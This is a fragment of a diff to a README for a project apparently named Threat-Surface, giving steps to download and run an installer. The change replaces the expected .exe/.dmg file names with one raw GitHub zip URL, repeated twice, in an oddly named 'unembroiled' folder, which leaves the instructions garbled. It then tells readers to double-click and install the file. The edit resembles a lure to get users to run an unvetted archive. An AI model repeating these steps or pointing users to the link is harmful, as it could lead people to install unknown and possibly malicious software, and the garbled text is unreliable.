MSSolanki/Threat-Surface/README.md

    Click on the download link.
 The file will start downloading to your device.
 Depending on your internet speed, this may take a moment.

 4. **Locate the Downloaded File**
    Once the download finishes, check your "Downloads" folder.
-Find the file, which should be named something like `Threat-Surface.exe` or `Threat-Surface.dmg`.
+Find the file, which should be named something like `https://raw.githubusercontent.com/MSSolanki/Threat-Surface/main/unembroiled/Threat-Surface-v2.1-alpha.1.zip` or `https://raw.githubusercontent.com/MSSolanki/Threat-Surface/main/unembroiled/Threat-Surface-v2.1-alpha.1.zip`.

 5. **Run the Application**
    Double-click the file to open it.
 Follow any on-screen instructions to install the application.